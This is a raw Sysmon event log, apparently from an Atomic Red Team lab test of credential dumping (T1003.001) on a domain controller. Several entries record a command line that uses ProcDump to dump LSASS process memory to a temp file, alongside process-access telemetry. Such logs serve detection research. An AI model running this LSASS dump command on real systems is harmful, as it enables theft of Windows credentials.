16:51:01.791{29E67E80-D475-601A-4830-00000000A301}50885144C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7661|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 13241300x8000000000000000180181Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-02-03 16:51:01.791{29E67E80-D475-601A-4830-00000000A301}5088C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeHKU\S-1-5-21-1645871015-3279536928-3104981001-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000180180Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D475-601A-4830-00000000A301}5088C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180179Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180178Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180177Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180176Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180175Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-84F4-6019-2C05-00000000A301}19285340C:\Windows\system32\csrss.exe{29E67E80-D475-601A-4830-00000000A301}5088C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180174Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-D475-601A-4730-00000000A301}55726672C:\Windows\system32\cmd.exe{29E67E80-D475-601A-4830-00000000A301}5088C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000180173Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.783{29E67E80-D475-601A-4830-00000000A301}5088C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=D3763FFBFAF30BCFD866B8ED0324E7A3,SHA256=916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802,IMPHASH=83B075100F8ECC5BF8446EDDD8E9CD6E{29E67E80-D475-601A-4730-00000000A301}5572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp" 10341000x8000000000000000180172Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D475-601A-4730-00000000A301}5572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180171Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D475-601A-4730-00000000A301}5572C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FFACE881C43) 10341000x8000000000000000180170Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180169Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180168Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180167Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180166Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.775{29E67E80-84F4-6019-2C05-00000000A301}19285340C:\Windows\system32\csrss.exe{29E67E80-D475-601A-4730-00000000A301}5572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180165Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.760{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D475-601A-4730-00000000A301}5572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3746(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b35ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+13635de6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135ac1a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065395(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135e1474(wow64) 154100x8000000000000000180164Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.772{29E67E80-D475-601A-4730-00000000A301}5572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x8000000000000000180163Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.760{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-02-03 16:51:01.760 11241100x8000000000000000180162Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.760{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-02-03 16:51:01.760 10341000x8000000000000000180161Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.635{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D475-601A-4630-00000000A301}3432C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180160Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.635{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180159Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.635{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180158Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.635{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180157Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.635{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180156Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.635{29E67E80-84F4-6019-2C05-00000000A301}19285340C:\Windows\system32\csrss.exe{29E67E80-D475-601A-4630-00000000A301}3432C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180155Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.635{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D475-601A-4630-00000000A301}3432C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+141132a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.303